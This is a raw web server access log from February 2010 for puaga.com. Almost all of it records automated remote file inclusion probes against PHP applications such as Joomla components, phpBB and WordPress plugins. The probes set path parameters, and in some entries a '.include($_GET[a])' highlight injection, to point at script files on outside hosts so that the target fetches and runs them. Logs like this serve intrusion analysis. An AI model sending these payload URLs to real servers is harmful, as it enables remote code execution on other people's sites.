58.150.99.144 - - [13/Feb/2010:09:26:30 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:26:30 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:26:50 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:26:50 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:26:50 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [13/Feb/2010:09:27:23 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [13/Feb/2010:09:27:23 -0800] "GET /logs/access_100103.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [13/Feb/2010:09:27:23 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [13/Feb/2010:09:27:47 -0800] "GET /logs/access_100117.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [13/Feb/2010:09:28:18 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [13/Feb/2010:09:28:44 -0800] "GET /errors.php?error=http://astru2.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [13/Feb/2010:09:28:44 -0800] "GET /logs/access_100105.log%20%20//errors.php?error=http://astru2.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [13/Feb/2010:09:28:44 -0800] "GET /logs//errors.php?error=http://astru2.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [13/Feb/2010:09:28:50 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [13/Feb/2010:09:28:55 -0800] "GET /logs/access_100105.log%20%20//errors.php?error=http://astru2.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [13/Feb/2010:09:28:55 -0800] "GET /errors.php?error=http://astru2.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [13/Feb/2010:09:28:55 -0800] "GET /logs//errors.php?error=http://astru2.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:29:40 -0800] "GET /logs/access_100109.log%20//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
188.244.22.165 - - [13/Feb/2010:09:30:37 -0800] "GET /ideal/forum/ HTTP/1.0" 404 5258 "http://puaga.com/ideal/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "puaga.com"
123.143.98.5 - - [13/Feb/2010:09:30:46 -0800] "GET /logs////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:09:30:46 -0800] "GET /logs/access_100202.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:09:30:46 -0800] "GET ///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:09:31:03 -0800] "GET /logs/access_100121.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:31:27 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:31:27 -0800] "GET /delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:31:27 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:31:27 -0800] "GET /logs//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:31:28 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:31:28 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:31:28 -0800] "GET /logs/access_100112.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:31:31 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:31:33 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:31:33 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:31:33 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:31:41 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:31:41 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:31:41 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:31:48 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.56.66.210 - - [13/Feb/2010:09:32:28 -0800] "GET /robots.txt HTTP/1.0" 200 36 "http://www.puaga.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
64.56.66.210 - - [13/Feb/2010:09:32:29 -0800] "GET / HTTP/1.0" 200 3626 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:32:39 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.56.66.210 - - [13/Feb/2010:09:32:39 -0800] "GET /robots.txt HTTP/1.0" 200 36 "http://www.puaga.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
64.56.66.210 - - [13/Feb/2010:09:32:40 -0800] "GET /style/imagehover.js HTTP/1.0" 200 1410 "http://www.puaga.com/style/imagehover.js" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:32:40 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:32:46 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:33:16 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:09:33:17 -0800] "GET /logs/access_100126.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [13/Feb/2010:09:33:17 -0800] "GET /logs/access_100124.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [13/Feb/2010:09:33:17 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [13/Feb/2010:09:33:18 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:09:33:36 -0800] "GET /logs/access_100128.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:35:06 -0800] "GET /logs/access_100126.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:35:27 -0800] "GET /logs/access_100109.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:36:36 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:09:37:07 -0800] "GET /logs/access_100125.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:09:37:07 -0800] "GET /logs/access_100103.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:09:37:07 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:09:37:08 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
79.165.255.238 - - [13/Feb/2010:09:37:22 -0800] "GET /ideal/forum/posting.php?mode=newtopic&f=5 HTTP/1.0" 404 5258 "http://puaga.com/ideal/forum/posting.php?mode=newtopic&f=5" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
79.165.255.238 - - [13/Feb/2010:09:37:24 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
79.165.255.238 - - [13/Feb/2010:09:37:24 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
78.110.50.121 - - [13/Feb/2010:09:38:52 -0800] "GET /logs//components/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:09:38:52 -0800] "GET /components/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:09:38:52 -0800] "GET /logs/access_100103.log%20%20//components/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:09:39:47 -0800] "GET /logs/access_100103.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:09:39:48 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:09:39:48 -0800] "GET /logs/access_100125.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:09:39:48 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:09:39:57 -0800] "GET /logs/access_100104.log%20%20//components/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [13/Feb/2010:09:43:09 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:43:38 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:43:38 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:43:38 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:43:56 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:43:56 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:43:56 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:44:15 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:44:22 -0800] "GET /logs/access_100201.log//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:44:31 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:09:45:45 -0800] "GET /logs//components/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:09:45:45 -0800] "GET /components/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:09:45:46 -0800] "GET /logs/access_100104.log//components/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:46:23 -0800] "GET /logs/access_100123.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:46:30 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:46:30 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:46:30 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:46:30 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:48:08 -0800] "GET /logs/access_100117.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:48:08 -0800] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:48:08 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:48:21 -0800] "GET /logs/access_100117.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:48:21 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:48:21 -0800] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:09:48:23 -0800] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:09:48:23 -0800] "GET /logs/access_100117.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:09:48:23 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:49:10 -0800] "GET /logs/access_100107.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:49:18 -0800] "GET /logs/access_100107.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:49:29 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:49:29 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:49:29 -0800] "GET /config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:49:34 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:49:34 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:49:34 -0800] "GET /config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [13/Feb/2010:09:50:32 -0800] "GET /logs/access_100117.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [13/Feb/2010:09:50:32 -0800] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [13/Feb/2010:09:50:32 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:50:34 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:50:45 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:09:50:46 -0800] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
